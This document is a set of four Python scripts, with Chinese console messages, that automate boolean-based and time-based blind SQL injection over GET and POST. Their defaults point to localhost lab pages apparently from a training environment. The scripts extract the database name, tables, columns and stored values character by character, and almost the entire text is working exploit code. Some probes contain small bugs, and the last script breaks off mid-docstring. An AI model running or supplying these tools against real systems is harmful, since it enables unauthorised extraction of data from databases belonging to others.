BlindBool_get
python
import requests
from optparse import OptionParser
import threading
# Results collected by the Get* functions below; each of them writes into
# one of these module-level containers through a `global` statement.
DBName = ""      # name of the current database
DBTables = []    # table names recovered for DBName
DBColumns = []   # column names recovered for the table the user picked
DBData = {}      # column name -> list of values recovered for that column
# Marker substring: a probe counts as "true" when the response body contains it.
flag = 'You are in'
# Retry a few times and disable keep-alive so that a long run of small
# requests does not fail with "Max retries exceeded with url".
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.Session()
conn.keep_alive = False
def GetDBName(url):
    """Recover the current database name one character at a time.

    Every recovered character is appended to the module-level ``DBName``.
    A probe is a GET to ``url`` with a condition concatenated to it; the
    condition is treated as true when ``flag`` occurs in the response body.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
    """
    global DBName

    def holds(request_url):
        # One probe: marker in the page <=> injected condition was true.
        return flag in conn.get(request_url).content.decode("utf-8")

    print('[*]开始获取数据库名长度')
    # Step 1: the name length. If no candidate matches, the loop variable
    # simply keeps its last value (98).
    length_probe = url + "' and if(length(database())={0},1,0) --+"
    name_len = 0
    for name_len in range(1, 99):
        if holds(length_probe.format(name_len)):
            print("[*] 数据库名长度:" + str(name_len))
            break

    print("[*]开始获取数据库名")
    # Step 2: one position at a time, trying ASCII codes 33..127.
    char_probe = url + "' and if(ascii(substr(database(),{0},1))={1},1,0) --+"
    for pos in range(1, name_len + 1):
        for code in range(33, 128):
            if holds(char_probe.format(pos, code)):
                DBName += chr(code)
                print("[*]" + DBName)
                break
def GetDBTables(url, dbname):
    """Recover the table names of schema *dbname* and append them to ``DBTables``.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
        dbname: schema name interpolated into every probe.
    """
    global DBTables

    def holds(request_url):
        # One probe: marker in the page <=> injected condition was true.
        return flag in conn.get(request_url).content.decode("utf-8")

    # Step 1: number of tables (loop variable stays at 99 if nothing matches).
    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    count_probe = url + "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) --+"
    table_count = 0
    for table_count in range(1, 100):
        if holds(count_probe.format(dbname, table_count)):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname, table_count))
            break

    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    len_probe = url + "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) --+"
    char_probe = url + "' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) --+"
    name_len = 0
    for index in range(0, table_count):
        print("[*] 正在获取第{0}个表名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(1, 99):
            if holds(len_probe.format(dbname, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                if holds(char_probe.format(dbname, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBTables.append(name)
def GetDBColumns(url, dbname, dbtable):
    """Recover the column names of *dbtable* and append them to ``DBColumns``.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
        dbname: schema name interpolated into every probe.
        dbtable: table name interpolated into every probe.
    """
    global DBColumns

    def holds(request_url):
        # One probe: marker in the page <=> injected condition was true.
        return flag in conn.get(request_url).content.decode('utf-8')

    # Step 1: number of columns, candidates 0..98.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_probe = url + "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) --+"
    column_count = 0
    for column_count in range(0, 99):
        if holds(count_probe.format(dbname, dbtable, column_count)):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname, dbtable, column_count))
            break

    len_probe = url + "' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) --+"
    char_probe = url + "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) --+"
    for index in range(0, column_count):
        print("正在获取第{0}个字段的长度和名称:".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(0, 99):
            if holds(len_probe.format(dbname, dbtable, index, name_len)):
                break
        # Step 2b: the name itself. The position loop starts at 0 here,
        # so the first pass probes substr(..., 0, 1).
        name = ''
        for pos in range(0, name_len + 1):
            for code in range(33, 128):
                if holds(char_probe.format(dbname, dbtable, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBColumns.append(name)
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    """Recover every value of column *dbcolumn* in table *dbtable*.

    Values are appended to ``DBData[dbcolumn]`` (created on first use) and
    the whole ``DBData`` dict is printed after each value.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
        dbtable: table name interpolated into every probe.
        dbcolumn: column name interpolated into every probe.
    """
    global DBData

    def holds(request_url):
        # One probe: marker in the page <=> injected condition was true.
        return flag in conn.get(request_url).content.decode("utf-8")

    # Step 1: number of rows, candidates 0..98.
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_probe = url + "'and if ((select count({0}) from {1})={2},1,0) --+"
    row_count = 0
    for row_count in range(99):
        if holds(count_probe.format(dbcolumn, dbtable, row_count)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, row_count))
            break

    len_probe = url + "'and if ((select length({0}) from {1} limit {2},1)={3},1,0) --+"
    char_probe = url + "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) --+"
    for row in range(0, row_count):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        # Step 2a: length of this row's value (stays at 98 if no match).
        value_len = 0
        for value_len in range(99):
            if holds(len_probe.format(dbcolumn, dbtable, row, value_len)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, value_len))
                break
        # Step 2b: the value itself, position by position.
        value = ""
        for pos in range(1, value_len + 1):
            for code in range(33, 128):
                if holds(char_probe.format(dbcolumn, dbtable, row, pos, code)):
                    value += chr(code)
                    print(value)
                    break
        DBData.setdefault(dbcolumn, []).append(value)
        print(DBData)
# 盲注主函数
def StartSqli(url):
    """Interactive driver: database name, tables, then columns and values.

    Asks the user (via ``input``) which table to inspect, then repeatedly
    which column to dump; entering 0 at the column prompt ends the loop.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("({0}){1}".format(number, name))
    # Menu numbers are 1-based, list indices 0-based.
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    chosen_table = DBTables[tableIndex]
    GetDBColumns(url, DBName, chosen_table)
    while True:
        print("[+]数据表{0}的字段如下:".format(chosen_table))
        for number, name in enumerate(DBColumns, 1):
            print("({0}){1}".format(number, name))
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        GetDBData(url, chosen_table, DBColumns[columnIndex])
if __name__ == "__main__":
    try:
        parser = OptionParser("./BlindBool_get.py -u url")
        parser.add_option('-u', type='string', dest='url',
                          default='http://localhost/Less-8/?id=1',
                          help='设置目标url')
        options, _ = parser.parse_args()
        # The work runs on a separate thread; note the except below only
        # covers option parsing and thread start-up, not the worker itself.
        worker = threading.Thread(target=StartSqli, args=(options.url,))
        worker.start()
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')
BlindBool_post
python
import requests
from optparse import OptionParser
import threading
# Results collected by the Get* functions below; each of them writes into
# one of these module-level containers through a `global` statement.
DBName = ""      # name of the current database
DBTables = []    # table names recovered for DBName
DBColumns = []   # column names recovered for the table the user picked
DBData = {}      # column name -> list of values recovered for that column
# Marker substring: a probe counts as "true" when the response body contains it.
flag = 'flag'
# Retry a few times and disable keep-alive so that a long run of small
# requests does not fail with "Max retries exceeded with url".
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.Session()
conn.keep_alive = False
def GetDBName(url):
    """Recover the current database name one character at a time.

    Every recovered character is appended to the module-level ``DBName``.
    A probe is a POST of the login form (``uname``/``passwd``/``submit``)
    with the condition placed in ``uname``; the condition is treated as
    true when ``flag`` occurs in the response body.

    Args:
        url: URL the form is posted to.
    """
    global DBName

    def holds(payload):
        # One probe: marker in the page <=> injected condition was true.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        return flag in conn.post(url, data=form).content.decode("utf-8")

    print('[*]开始获取数据库名长度')
    # Step 1: the name length (loop variable stays at 98 if no match).
    length_probe = "admin' and if(length(database())={0},1,0) #"
    name_len = 0
    for name_len in range(1, 99):
        if holds(length_probe.format(name_len)):
            print("[*] 数据库名长度:" + str(name_len))
            break

    print("[*]开始获取数据库名")
    # Step 2: one position at a time, trying ASCII codes 33..127.
    char_probe = "admin' and if(ascii(substr(database(),{0},1))={1},1,0) #"
    for pos in range(1, name_len + 1):
        for code in range(33, 128):
            if holds(char_probe.format(pos, code)):
                DBName += chr(code)
                print("[*]" + DBName)
                break
def GetDBTables(url, dbname):
    """Recover the table names of schema *dbname* and append them to ``DBTables``.

    Args:
        url: URL the login form is posted to.
        dbname: schema name interpolated into every probe.
    """
    global DBTables

    def holds(payload):
        # One probe: marker in the page <=> injected condition was true.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        return flag in conn.post(url, data=form).content.decode("utf-8")

    # Step 1: number of tables (loop variable stays at 99 if nothing matches).
    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    count_probe = "admin' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) #"
    table_count = 0
    for table_count in range(1, 100):
        if holds(count_probe.format(dbname, table_count)):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname, table_count))
            break

    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    len_probe = "admin' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) #"
    char_probe = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) #"
    name_len = 0
    for index in range(0, table_count):
        print("[*] 正在获取第{0}个表名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(1, 99):
            if holds(len_probe.format(dbname, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                if holds(char_probe.format(dbname, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBTables.append(name)
def GetDBColumns(url, dbname, dbtable):
    """Recover the column names of *dbtable* and append them to ``DBColumns``.

    Args:
        url: URL the login form is posted to.
        dbname: schema name interpolated into every probe.
        dbtable: table name interpolated into every probe.
    """
    global DBColumns

    def holds(payload):
        # One probe: marker in the page <=> injected condition was true.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        return flag in conn.post(url, data=form).content.decode('utf-8')

    # Step 1: number of columns, candidates 0..98.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_probe = "admin' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) #"
    column_count = 0
    for column_count in range(0, 99):
        if holds(count_probe.format(dbname, dbtable, column_count)):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname, dbtable, column_count))
            break

    len_probe = "admin' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) #"
    char_probe = "admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) #"
    for index in range(0, column_count):
        print("正在获取第{0}个字段的长度和名称:".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(0, 99):
            if holds(len_probe.format(dbname, dbtable, index, name_len)):
                break
        # Step 2b: the name itself. The position loop starts at 0 here,
        # so the first pass probes substr(..., 0, 1).
        name = ''
        for pos in range(0, name_len + 1):
            for code in range(33, 128):
                if holds(char_probe.format(dbname, dbtable, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBColumns.append(name)
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    """Recover every value of column *dbcolumn* in table *dbtable*.

    Values are appended to ``DBData[dbcolumn]`` (created on first use) and
    the whole ``DBData`` dict is printed after each value.

    Args:
        url: URL the login form is posted to.
        dbtable: table name interpolated into every probe.
        dbcolumn: column name interpolated into every probe.
    """
    global DBData

    def holds(payload):
        # One probe: marker in the page <=> injected condition was true.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        return flag in conn.post(url, data=form).content.decode("utf-8")

    # Step 1: number of rows, candidates 0..98.
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_probe = "admin' and if ((select count({0}) from {1})={2},1,0) #"
    row_count = 0
    for row_count in range(99):
        if holds(count_probe.format(dbcolumn, dbtable, row_count)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, row_count))
            break

    len_probe = "admin' and if ((select length({0}) from {1} limit {2},1)={3},1,0) #"
    char_probe = "admin' and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) #"
    for row in range(0, row_count):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        # Step 2a: length of this row's value (stays at 98 if no match).
        value_len = 0
        for value_len in range(99):
            if holds(len_probe.format(dbcolumn, dbtable, row, value_len)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, value_len))
                break
        # Step 2b: the value itself, position by position.
        value = ""
        for pos in range(1, value_len + 1):
            for code in range(33, 128):
                if holds(char_probe.format(dbcolumn, dbtable, row, pos, code)):
                    value += chr(code)
                    print(value)
                    break
        DBData.setdefault(dbcolumn, []).append(value)
        print(DBData)
# 盲注主函数
def StartSqli(url):
    """Interactive driver: database name, tables, then columns and values.

    Asks the user (via ``input``) which table to inspect, then repeatedly
    which column to dump; entering 0 at the column prompt ends the loop.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("({0}){1}".format(number, name))
    # Menu numbers are 1-based, list indices 0-based.
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    chosen_table = DBTables[tableIndex]
    GetDBColumns(url, DBName, chosen_table)
    while True:
        print("[+]数据表{0}的字段如下:".format(chosen_table))
        for number, name in enumerate(DBColumns, 1):
            print("({0}){1}".format(number, name))
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        GetDBData(url, chosen_table, DBColumns[columnIndex])
if __name__ == "__main__":
    try:
        parser = OptionParser("./BlindBool_post.py -u url")
        parser.add_option('-u', type='string', dest='url',
                          default='http://localhost/Less-15',
                          help='设置目标url')
        options, _ = parser.parse_args()
        # The work runs on a separate thread; note the except below only
        # covers option parsing and thread start-up, not the worker itself.
        worker = threading.Thread(target=StartSqli, args=(options.url,))
        worker.start()
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')
BlindTime_get
python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# Results collected by the Get* functions below; each of them writes into
# one of these module-level containers through a `global` statement.
DBName = ""      # name of the current database
DBTables = []    # table names recovered for DBName
DBColumns = []   # column names recovered for the table the user picked
DBData = {}      # column name -> list of values recovered for that column
# Retry a few times and disable keep-alive so that a long run of small
# requests does not fail with "Max retries exceeded with url".
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.Session()
conn.keep_alive = False
# 盲注主函数
def StartSqli(url):
    """Interactive driver: database name, tables, then columns and values.

    Asks the user (via ``input``) which table to inspect, then repeatedly
    which column to dump; entering 0 at the column prompt ends the loop.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("({0}){1}".format(number, name))
    # Menu numbers are 1-based, list indices 0-based.
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    chosen_table = DBTables[tableIndex]
    GetDBColumns(url, DBName, chosen_table)
    while True:
        print("[+]数据表{0}的字段如下:".format(chosen_table))
        for number, name in enumerate(DBColumns, 1):
            print("({0}){1}".format(number, name))
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        GetDBData(url, chosen_table, DBColumns[columnIndex])
# 获取数据库名函数
def GetDBName(url):
    """Recover the current database name one character at a time.

    Every recovered character is appended to the module-level ``DBName``.
    A probe is a GET to ``url`` with a condition concatenated to it; the
    condition is treated as true when the request takes at least 5 s to
    complete (the probe asks the server for sleep(5) in that branch).

    Args:
        url: base request URL; the probe text is appended to it verbatim.
    """
    global DBName

    def delayed(request_url):
        # Wall-clock time around the request decides the probe's outcome.
        started = time.time()
        conn.get(request_url)
        return time.time() - started >= 5

    print("[-]开始获取数据库名长度")
    # Step 1: the name length (loop variable stays at 98 if no match).
    length_probe = url + "' and if(length(database())={0},sleep(5),0) --+"
    name_len = 0
    for name_len in range(1, 99):
        if delayed(length_probe.format(name_len)):
            print("[+]数据库名长度:" + str(name_len))
            break

    print("[-]开始获取数据库名")
    # Step 2: one position at a time, trying ASCII codes 33..127.
    char_probe = url + "' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)--+"
    for pos in range(1, name_len + 1):
        for code in range(33, 128):
            if delayed(char_probe.format(pos, code)):
                DBName += chr(code)
                print("[-]" + DBName)
                break
#获取数据库表函数
def GetDBTables(url, dbname):
    """Recover the table names of schema *dbname* and append them to ``DBTables``.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
        dbname: schema name interpolated into every probe.
    """
    global DBTables

    def delayed(request_url):
        # A response that took >= 5 s means the sleep(5) branch ran.
        started = time.time()
        conn.get(request_url)
        return time.time() - started >= 5

    # Step 1: number of tables (loop variable stays at 98 if nothing matches).
    print("[-]开始获取{0}数据库表数量:".format(dbname))
    count_probe = url + "' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) --+"
    table_count = 0
    for table_count in range(1, 99):
        if delayed(count_probe.format(dbname, table_count)):
            print("[+]{0}数据库的表数量为:{1}".format(dbname, table_count))
            break

    print("[-]开始获取{0}数据库的表".format(dbname))
    len_probe = url + "' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) --+"
    char_probe = url + "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)--+"
    name_len = 0
    for index in range(0, table_count):
        print("[-]正在获取第{0}个表名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(1, 99):
            if delayed(len_probe.format(dbname, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                if delayed(char_probe.format(dbname, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBTables.append(name)
# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
    """Recover the column names of *dbtable* and append them to ``DBColumns``.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
        dbname: schema name interpolated into every probe.
        dbtable: table name interpolated into every probe.
    """
    global DBColumns

    def delayed(request_url):
        # A response that took >= 5 s means the sleep(5) branch ran.
        started = time.time()
        conn.get(request_url)
        return time.time() - started >= 5

    # Step 1: number of columns, candidates 0..98.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_probe = url + "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) --+"
    column_count = 0
    for column_count in range(99):
        if delayed(count_probe.format(dbname, dbtable, column_count)):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, column_count))
            break

    len_probe = url + "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) --+"
    char_probe = url + "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) --+"
    for index in range(0, column_count):
        print("[-]正在获取第{0}个字段名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(99):
            if delayed(len_probe.format(dbname, dbtable, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                if delayed(char_probe.format(dbname, dbtable, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBColumns.append(name)
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    """Recover every value of column *dbcolumn* in table *dbtable*.

    Values are appended to ``DBData[dbcolumn]`` (created on first use) and
    the whole ``DBData`` dict is printed after each value.

    Args:
        url: base request URL; the probe text is appended to it verbatim.
        dbtable: table name interpolated into every probe.
        dbcolumn: column name interpolated into every probe.
    """
    global DBData

    def delayed(request_url):
        # A response that took >= 5 s means the sleep(5) branch ran.
        started = time.time()
        conn.get(request_url)
        return time.time() - started >= 5

    # Step 1: number of rows, candidates 0..98.
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_probe = url + "' and if((select count({0}) from {1})={2},sleep(5),0) --+"
    row_count = 0
    for row_count in range(99):
        if delayed(count_probe.format(dbcolumn, dbtable, row_count)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, row_count))
            break

    len_probe = url + "'and if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) --+"
    char_probe = url + "' and if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) --+"
    for row in range(0, row_count):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        # Step 2a: length of this row's value (stays at 98 if no match).
        value_len = 0
        for value_len in range(99):
            if delayed(len_probe.format(dbcolumn, dbtable, row, value_len)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, value_len))
                break
        # Step 2b: the value itself, position by position.
        value = ""
        for pos in range(1, value_len + 1):
            for code in range(33, 128):
                if delayed(char_probe.format(dbcolumn, dbtable, row, pos, code)):
                    value += chr(code)
                    print(value)
                    break
        DBData.setdefault(dbcolumn, []).append(value)
        print(DBData)
if __name__ == '__main__':
    try:
        parser = OptionParser("./BlindTime_get.py -u url")
        parser.add_option('-u', '--url', dest='url',
                          default='http://localhost/Less-9/?id=1',
                          type='string', help='target URL')
        options, _ = parser.parse_args()
        # The work runs on a separate thread; note the except below only
        # covers option parsing and thread start-up, not the worker itself.
        worker = threading.Thread(target=StartSqli, args=(options.url,))
        worker.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")
BlindTime_post
python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# Results collected by the Get* functions below; each of them writes into
# one of these module-level containers through a `global` statement.
DBName = ""      # name of the current database
DBTables = []    # table names recovered for DBName
DBColumns = []   # column names recovered for the table the user picked
DBData = {}      # column name -> list of values recovered for that column
# Retry a few times and disable keep-alive so that a long run of small
# requests does not fail with "Max retries exceeded with url".
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.Session()
conn.keep_alive = False
# 获取数据库名函数
def GetDBName(url):
    """Recover the current database name one character at a time.

    Every recovered character is appended to the module-level ``DBName``.
    A probe is a POST of the login form (``uname``/``passwd``/``submit``)
    with the condition placed in ``uname``; the condition is treated as
    true when the request takes at least 5 s to complete.

    Args:
        url: URL the form is posted to.
    """
    global DBName

    def delayed(payload):
        # Wall-clock time around the request decides the probe's outcome.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        started = time.time()
        conn.post(url, data=form)
        return time.time() - started >= 5

    print("[-]开始获取数据库名长度")
    # Step 1: the name length (loop variable stays at 98 if no match).
    length_probe = "admin' and if(length(database())={0},sleep(5),0) #"
    name_len = 0
    for name_len in range(1, 99):
        if delayed(length_probe.format(name_len)):
            print("[+]数据库名长度:" + str(name_len))
            break

    print("[-]开始获取数据库名")
    # Step 2: one position at a time, trying ASCII codes 33..127.
    char_probe = "admin' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)#"
    for pos in range(1, name_len + 1):
        for code in range(33, 128):
            if delayed(char_probe.format(pos, code)):
                DBName += chr(code)
                print("[-]" + DBName)
                break
#获取数据库表函数
def GetDBTables(url, dbname):
    """Recover the table names of schema *dbname* and append them to ``DBTables``.

    Args:
        url: URL the login form is posted to.
        dbname: schema name interpolated into every probe.
    """
    global DBTables

    def delayed(payload):
        # A response that took >= 5 s means the sleep(5) branch ran.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        started = time.time()
        conn.post(url, data=form)
        return time.time() - started >= 5

    # Step 1: number of tables (loop variable stays at 98 if nothing matches).
    print("[-]开始获取{0}数据库表数量:".format(dbname))
    count_probe = "admin' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) #"
    table_count = 0
    for table_count in range(1, 99):
        if delayed(count_probe.format(dbname, table_count)):
            print("[+]{0}数据库的表数量为:{1}".format(dbname, table_count))
            break

    print("[-]开始获取{0}数据库的表".format(dbname))
    len_probe = "admin' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) #"
    char_probe = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)#"
    name_len = 0
    for index in range(0, table_count):
        print("[-]正在获取第{0}个表名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(1, 99):
            if delayed(len_probe.format(dbname, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                if delayed(char_probe.format(dbname, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBTables.append(name)
# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
    """Recover the column names of *dbtable* and append them to ``DBColumns``.

    Args:
        url: URL the login form is posted to.
        dbname: schema name interpolated into every probe.
        dbtable: table name interpolated into every probe.
    """
    global DBColumns

    def delayed(payload):
        # A response that took >= 5 s means the sleep(5) branch ran.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        started = time.time()
        conn.post(url, data=form)
        return time.time() - started >= 5

    # Step 1: number of columns, candidates 0..98.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_probe = "admin' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) #"
    column_count = 0
    for column_count in range(99):
        if delayed(count_probe.format(dbname, dbtable, column_count)):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, column_count))
            break

    len_probe = "admin' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) #"
    # This template, unlike the others in this function, does not start
    # with the "admin" prefix.
    char_probe = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) #"
    for index in range(0, column_count):
        print("[-]正在获取第{0}个字段名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(99):
            if delayed(len_probe.format(dbname, dbtable, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                if delayed(char_probe.format(dbname, dbtable, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBColumns.append(name)
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    """Recover every value of column *dbcolumn* in table *dbtable*.

    Values are appended to ``DBData[dbcolumn]`` (created on first use) and
    the whole ``DBData`` dict is printed after each value.

    Args:
        url: URL the login form is sent to.
        dbtable: table name interpolated into every probe.
        dbcolumn: column name interpolated into every probe.
    """
    global DBData

    def delayed(send, payload):
        # `send` is the session method used for this probe; a response that
        # took >= 5 s means the sleep(5) branch ran.
        form = {'uname': payload, 'passwd': 'admin', 'submit': 'Submit'}
        started = time.time()
        send(url, data=form)
        return time.time() - started >= 5

    # Step 1: number of rows, candidates 0..98.
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_probe = "admin' and if((select count({0}) from {1})={2},sleep(5),0) #"
    row_count = 0
    for row_count in range(99):
        if delayed(conn.post, count_probe.format(dbcolumn, dbtable, row_count)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, row_count))
            break

    len_probe = "admin'and if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) #"
    char_probe = "admin' and if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) #"
    for row in range(0, row_count):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        # Step 2a: length of this row's value (stays at 98 if no match).
        value_len = 0
        for value_len in range(99):
            if delayed(conn.post, len_probe.format(dbcolumn, dbtable, row, value_len)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, value_len))
                break
        # Step 2b: the value itself, position by position. These probes go
        # out through conn.get (with the form as body), not conn.post.
        value = ""
        for pos in range(1, value_len + 1):
            for code in range(33, 128):
                if delayed(conn.get, char_probe.format(dbcolumn, dbtable, row, pos, code)):
                    value += chr(code)
                    print(value)
                    break
        DBData.setdefault(dbcolumn, []).append(value)
        print(DBData)
# 盲注主函数
def StartSqli(url):
    """Interactive driver: database name, tables, then columns and values.

    Asks the user (via ``input``) which table to inspect, then repeatedly
